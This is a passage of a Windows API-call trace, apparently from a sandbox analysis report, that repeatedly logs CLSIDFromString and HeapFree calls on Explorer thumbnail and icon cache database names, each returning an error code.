[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.650] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.650] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_idx.db!rwWriterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.651] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.651] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1920.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.651] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.651] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_768.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.651] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.651] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_48.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.651] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.652] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.652] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.652] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_exif.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.652] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.652] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide_alternate.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.652] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.652] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.652] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.652] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_custom_stream.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.652] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.652] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_exif.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.653] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.653] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_idx.db!rwWriterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.653] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.653] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_16.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.653] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.653] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_32.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.653] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.653] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_48.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.653] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.653] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_96.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.654] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.654] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_256.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.654] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.654] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_768.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.654] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.654] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_1280.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.654] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.654] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_1920.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.654] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.654] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_2560.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.654] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.654] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_sr.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.654] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.655] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_wide.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.655] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.655] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_exif.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.655] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.655] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_wide_alternate.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.655] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.655] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_custom_stream.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.655] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.655] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_idx.db!IconCacheInit", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.655] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.655] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_16.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.655] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.656] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_48.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.656] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.656] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.656] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.656] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_16.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.656] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.656] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_custom_stream.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.656] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.656] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.656] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.656] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_2560.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.656] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.657] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1920.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.657] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.657] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1280.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.657] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.657] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_768.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.657] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.657] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.657] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.657] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.657] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.657] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_48.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.657] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.658] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.658] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_16.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.658] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.658] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide_alternate.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.658] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.658] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_768.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.658] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_custom_stream.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.659] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.659] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_wide.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.659] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.659] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_sr.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.659] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.659] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_2560.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.659] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.659] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_1920.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.659] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.659] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_1280.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.660] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.660] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_768.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.660] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.660] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_256.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.660] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.660] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_96.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 